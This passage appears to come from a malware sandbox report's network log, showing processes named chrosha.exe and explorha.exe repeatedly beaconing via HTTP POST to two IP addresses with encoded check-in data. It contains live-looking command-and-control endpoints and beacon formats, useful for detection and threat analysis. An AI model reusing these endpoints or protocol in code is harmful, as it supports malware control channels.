                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:02.158507109 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      447192.168.2.550291193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:02.149525881 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:02.397469044 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      448192.168.2.550292193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:02.406327963 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:02.654135942 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      449192.168.2.550293193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:02.756772995 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:03.001389980 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      450192.168.2.550294193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:03.008313894 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:03.252196074 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      451192.168.2.550295193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:03.251945019 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:03.503062010 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      452192.168.2.550296193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:03.507286072 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:03.762892962 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      453192.168.2.550297193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:03.866053104 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:04.108968019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      454192.168.2.550298193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:04.117784023 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:04.364065886 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      455192.168.2.550299193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:04.359121084 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:04.610210896 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      456192.168.2.550300193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:04.612246990 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:04.860893965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      457192.168.2.550301193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:04.964756966 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.212872028 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      458192.168.2.550302193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.228532076 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.475997925 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      459192.168.2.550303193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.463726044 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.711889029 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      460192.168.2.550304193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.731981039 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:05.986743927 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      461192.168.2.550305193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.073044062 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.322376013 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      462192.168.2.550306193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.350641966 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.596870899 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
